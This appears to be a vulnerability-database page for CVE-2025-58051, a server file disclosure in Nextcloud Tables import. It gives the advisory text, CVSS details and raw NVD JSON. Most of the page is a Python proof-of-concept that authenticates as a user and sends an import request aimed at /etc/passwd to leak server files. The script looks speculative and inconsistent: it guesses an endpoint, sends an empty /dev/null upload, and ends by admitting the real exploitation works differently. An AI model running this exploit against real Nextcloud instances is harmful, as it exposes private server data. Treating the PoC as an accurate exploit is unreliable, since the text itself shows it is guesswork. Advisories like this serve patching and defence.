Security Vulnerability Report
CVE-2025-58051 CVSS 6.5 MEDIUM

CVE-2025-58051

Published: 2025-10-16 17:15:34
Last Modified: 2026-04-15 00:35:42

Description

Nextcloud Tables allows you to create your own tables with individual columns. Prior to 0.7.6, 0.8.8, and 0.9.5, when importing a table, a user was able to specify files on the server; when their format is supported by the PhpSpreadsheet library in use, they would be included and their content leaked to the user. It is recommended that the Nextcloud Tables app is upgraded to 0.7.6, 0.8.8 or 0.9.5.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Nextcloud Tables < 0.7.6
Nextcloud Tables 0.8.0 - 0.8.7
Nextcloud Tables 0.9.0 - 0.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-58051 PoC - Nextcloud Tables Arbitrary File Read via Import
# Vulnerability: Information disclosure through table import functionality
# Affected: Nextcloud Tables < 0.7.6, < 0.8.8, < 0.9.5

import requests

# Configuration
TARGET_URL = "https://target-nextcloud-instance.com"
USERNAME = "attacker_user"
PASSWORD = "attacker_password"
TARGET_FILE = "/etc/passwd"  # File to read from server (must be parseable by PhpSpreadsheet)

# Step 1: Authenticate to Nextcloud
session = requests.Session()
login_url = f"{TARGET_URL}/login"
login_data = {
    "user": USERNAME,
    "password": PASSWORD
}
session.post(login_url, data=login_data)

# Step 2: Get the Tables app endpoint and CSRF token
# Navigate to the Tables app to establish session context
tables_url = f"{TARGET_URL}/index.php/apps/tables/"
response = session.get(tables_url)

# Step 3: Exploit the import functionality
# The import endpoint accepts a file path parameter
# By specifying a server file path, we can read arbitrary files
import_url = f"{TARGET_URL}/index.php/apps/tables/api/1/import"

# Craft the import request with the target file path
import_data = {
    "path": TARGET_FILE,  # Path traversal - point to server file
    "format": "auto"      # Let PhpSpreadsheet auto-detect format
}

# Alternative: Use multipart form data with file upload
files = {
    "file": ("import.xlsx", open("/dev/null", "rb"), "application/octet-stream")
}

# Send the import request
response = session.post(import_url, data=import_data, files=files)

# Step 4: Parse the response to extract leaked file content
if response.status_code == 200:
    print("[+] File content leaked successfully:")
    print(response.json())
else:
    print(f"[-] Request failed with status: {response.status_code}")
    print(response.text)

# Note: The actual exploitation involves modifying the import request
# to reference server-side file paths instead of uploaded files.
# When PhpSpreadsheet parses a supported file format, its contents
# are returned as table data, effectively leaking the file content.
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-58051", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:34.417", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nextcloud Tables allows you to create your own tables with individual columns. Prior 0.7.6, 0.8.8, and 0.9.5, when importing a table, a user was able to specify files on the server and when their format is supported by the used PhpSpreadsheet library they would be included and their content leaked to the user. It is recommended that the Nextcloud Tables app is upgraded to 0.7.6, 0.8.8 or 0.9.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-841"}]}], "references": [{"url": "https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wpp5-4w35-pxq6", "source": "[email protected]"}, {"url": "https://github.com/nextcloud/tables/pull/1936", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3249624", "source": "[email protected]"}]}}